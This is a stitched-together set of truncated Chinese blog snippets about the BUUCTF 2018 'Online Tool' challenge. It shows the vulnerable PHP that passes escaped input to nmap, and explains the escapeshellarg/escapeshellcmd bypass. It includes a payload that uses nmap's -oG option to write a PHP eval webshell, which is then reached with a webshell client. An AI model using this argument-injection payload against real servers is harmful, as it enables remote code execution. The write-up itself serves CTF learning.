[BUUCTF 2018]Online Tool 打开环境后显示如下的代码 <?phpif(isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {$_SERVER['REMOTE_ADDR'] =$_SERVER['HTTP_X_FORWARDED_FOR']; }if(!isset($_GET['host'])) {highlight_file(__FILE__); }else{$host=$_GET['host'];$host=escapeshellarg($host);$...
题目链接:[BUUCTF 2018]Online Tool。 打开环境,如下所示。 直接得到源码,如下。 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $...
[BUUCTF 2018]Online Tool nmap 的 -oG 参数项 escapeshellarg() 和 escapeshellcmd() 的绕过方法:单引号( ' ) payload:?host='<?php eval($_POST[123]);?> -oG 1.php%20 在网站前端得到一段 md5 值是文件夹地址名 蚁剑连接xxx/7fff22a1d06d6a44cdf617546029cd7e/1.php,根目录下得到flag ?host='<...
} if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_GET['host']; $host = escapeshellarg($host); $host = escapeshellcmd($host); $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']); echo 'you are in sandbox '.$sandbox; @mkdir($sandbox); chdir($s...
【学习笔记15】buu [BUUCTF 2018]Online Tool 技术标签:ctf学习笔记pythonjavashell数据库ubuntu 查看原文 获取WordPress访客评论/留言的真实IP地址 https://www.jianshu.com/p/f53313c8a16d 第一、脚本功能if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $list = explode(',',$_SERVER['HTTP_X_...
[BUUCTF 2018]Online Tool 0x00知识点 nmap -oG 命令写入文件 参数注入 漏洞产生原因: 使用escapeshellcmd / escapeshellarg时不可能执行第二个命令。 但是我们仍然可以将参数传递给第一个命令。 这意味着我们也可以将新选项传递给命令。 利用漏洞的能力取决于目标可执行文件。 0x01:CTF remote_addr和x_forwarded_...
https://buuoj.cn/challenges#[BUUCTF%202018]Online%20Tool 这道题都是没见过的,当是拓展知识了,主要考察了escapeshellarg()函数和escapeshellcmd()这两个函数混用产生的安全隐患。 以及对nmap指令参数的了解 CVE-2016-10045,补丁在PHPMailer 5.2.20中被发布。 源代码: <?phpif (isset($_SERVER['HTTP_X_...
$sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']); //$_SERVER['REMOTE_ADDR'] #正在浏览当前页面用户的 IP 地址。 echo 'you are in sandbox '.$sandbox; @ mkdir($sandbox); chdir($sandbox); echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);//执行把host传进来的命令...
BUUCTF 2018 - Online Tool 代码审计 php BUUCTF tcl 看着有复现,于是记笔记,学习一下这道题: <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else ...
buuctf 题目: <?phpif(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){$_SERVER['REMOTE_ADDR']=$_SERVER['HTTP_X_FORWARDED_FOR'];}if(!isset($_GET['host'])){highlight_file(__FILE__);}else{$host=$_GET['host'];$host=escapeshellarg($host);$host=escapeshellcmd($host);$sandbox=md5("glzj...